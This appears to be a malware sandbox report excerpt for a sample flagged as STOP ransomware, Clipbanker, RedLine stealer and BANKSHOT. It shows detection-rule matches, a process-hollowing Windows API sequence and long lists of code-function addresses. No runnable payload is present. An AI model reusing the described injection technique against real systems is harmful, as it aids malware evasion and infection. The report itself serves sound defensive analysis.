Source: 1.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.sIQywRNC5M.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.sIQywRNC5M.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.sIQywRNC5M.exe.5e915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.sIQywRNC5M.exe.5e915a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.sIQywRNC5M.exe.5d815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.sIQywRNC5M.exe.5d815a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 21.2.sIQywRNC5M.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 21.2.sIQywRNC5M.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.sIQywRNC5M.exe.5e915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.sIQywRNC5M.exe.5e915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.sIQywRNC5M.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.sIQywRNC5M.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.sIQywRNC5M.exe.5d815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.sIQywRNC5M.exe.5d815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.sIQywRNC5M.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.sIQywRNC5M.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000017.00000002.2729522071.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2729522071.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001A.00000002.2728786500.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001A.00000002.2728786500.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000010.00000002.2309758301.0000000000BBC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.3340917154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001C.00000002.3340917154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000015.00000002.2542639279.0000000004436000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000011.00000002.4492888211.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000011.00000002.4492888211.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001B.00000002.3341705658.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001B.00000002.3341705658.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.2072615613.000000000459B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001B.00000002.3341836401.0000000000A60000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000017.00000002.2729646058.0000000000910000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.2309561006.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000010.00000002.2309561006.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.3965896478.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.3965896478.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.2544651691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.2029947152.0000000004449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2111904920.0000000001AFE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 0000000B.00000002.2229691147.00000000009AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000015.00000002.2542986174.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000016.00000002.2555347739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000018.00000002.2700850875.0000000004474000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001D.00000002.3966079968.0000000000AB0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2030033825.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.2231956376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000D.00000002.2231956376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001E.00000002.3965041691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.3965041691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.2229449247.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2229449247.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000004.00000002.2052258442.0000000004449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2072698379.0000000005E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000001.00000002.2046900004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: Process Memory Space: sIQywRNC5M.exe PID: 5896, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 3624, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 4712, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 4220, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 4160, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 1476, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 2928, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 3580, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 2624, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: sIQywRNC5M.exe PID: 3808, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,		0_2_05DC0110
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D80110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,		4_2_05D80110

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_00404F6E	0_2_00404F6E
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC3520	0_2_05DC3520
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC7520	0_2_05DC7520
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DED7F1	0_2_05DED7F1
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCA79A	0_2_05DCA79A
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCC760	0_2_05DCC760
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCE6E0	0_2_05DCE6E0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCA699	0_2_05DCA699
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05E0B69F	0_2_05E0B69F
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DED1A4	0_2_05DED1A4
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05E0E141	0_2_05E0E141
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC9120	0_2_05DC9120
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DD00D0	0_2_05DD00D0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC30F0	0_2_05DC30F0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC70E0	0_2_05DC70E0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCB0B0	0_2_05DCB0B0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCB000	0_2_05DCB000
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DDF030	0_2_05DDF030
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCA026	0_2_05DCA026
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC7393	0_2_05DC7393
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05E0E37C	0_2_05E0E37C
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05E422C0	0_2_05E422C0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC7220	0_2_05DC7220
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC5DF7	0_2_05DC5DF7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC5DE7	0_2_05DC5DE7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05E02D1E	0_2_05E02D1E
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DF4E9F	0_2_05DF4E9F
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC8E60	0_2_05DC8E60
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC89D0	0_2_05DC89D0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC59F7	0_2_05DC59F7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DEF9B0	0_2_05DEF9B0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DEE9A3	0_2_05DEE9A3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCA916	0_2_05DCA916
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DE18D0	0_2_05DE18D0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC7880	0_2_05DC7880
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCDBE0	0_2_05DCDBE0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC2B60	0_2_05DC2B60
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DD0B00	0_2_05DD0B00
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC7A80	0_2_05DC7A80
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DCCA10	0_2_05DCCA10
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040D240	1_2_0040D240
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00419F90	1_2_00419F90
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040C070	1_2_0040C070
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0042E003	1_2_0042E003
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00408030	1_2_00408030
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00410160	1_2_00410160
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004021C0	1_2_004021C0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0044237E	1_2_0044237E
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004084C0	1_2_004084C0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004344FF	1_2_004344FF
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0043E5A3	1_2_0043E5A3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040A660	1_2_0040A660
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0041E690	1_2_0041E690
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00406740	1_2_00406740
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00402750	1_2_00402750
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040A710	1_2_0040A710
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00408780	1_2_00408780
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0042C804	1_2_0042C804
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00406880	1_2_00406880
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004349F3	1_2_004349F3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004069F3	1_2_004069F3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00402B80	1_2_00402B80
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00406B80	1_2_00406B80
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0044ACFF	1_2_0044ACFF
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0042CE51	1_2_0042CE51
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00434E0B	1_2_00434E0B
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00406EE0	1_2_00406EE0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00420F30	1_2_00420F30
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00405057	1_2_00405057
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0042F010	1_2_0042F010
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004070E0	1_2_004070E0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004391F6	1_2_004391F6
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00435240	1_2_00435240
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004C9343	1_2_004C9343
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00405447	1_2_00405447
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00405457	1_2_00405457
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00449506	1_2_00449506
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0044B5B1	1_2_0044B5B1
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00435675	1_2_00435675
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00409686	1_2_00409686
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040F730	1_2_0040F730
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0044D7A1	1_2_0044D7A1
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00481920	1_2_00481920
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0044D9DC	1_2_0044D9DC
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00449A71	1_2_00449A71
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00443B40	1_2_00443B40
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00409CF9	1_2_00409CF9
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040DD40	1_2_0040DD40
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00427D6C	1_2_00427D6C
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040BDC0	1_2_0040BDC0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00409DFA	1_2_00409DFA
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00409F76	1_2_00409F76
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0046BFE0	1_2_0046BFE0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00449FE3	1_2_00449FE3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D83520	4_2_05D83520
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D87520	4_2_05D87520
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DAD7F1	4_2_05DAD7F1
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8A79A	4_2_05D8A79A
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8C760	4_2_05D8C760
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8E6E0	4_2_05D8E6E0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8A699	4_2_05D8A699
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DCB69F	4_2_05DCB69F
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DAD1A4	4_2_05DAD1A4
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DCE141	4_2_05DCE141
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D89120	4_2_05D89120
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D900D0	4_2_05D900D0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D830F0	4_2_05D830F0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D870E0	4_2_05D870E0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8B0B0	4_2_05D8B0B0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8B000	4_2_05D8B000
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D9F030	4_2_05D9F030
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8A026	4_2_05D8A026
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D87393	4_2_05D87393
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DCE37C	4_2_05DCE37C
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05E022C0	4_2_05E022C0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D87220	4_2_05D87220
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D85DF7	4_2_05D85DF7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D85DE7	4_2_05D85DE7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DC2D1E	4_2_05DC2D1E
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DB4E9F	4_2_05DB4E9F
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D88E60	4_2_05D88E60
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D889D0	4_2_05D889D0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D859F7	4_2_05D859F7
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DAF9B0	4_2_05DAF9B0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DAE9A3	4_2_05DAE9A3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8A916	4_2_05D8A916
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DA18D0	4_2_05DA18D0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D87880	4_2_05D87880
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8DBE0	4_2_05D8DBE0
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D82B60	4_2_05D82B60
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D90B00	4_2_05D90B00
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D87A80	4_2_05D87A80
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D8CA10	4_2_05D8CA10
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0042E003	5_2_0042E003
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040D240	5_2_0040D240
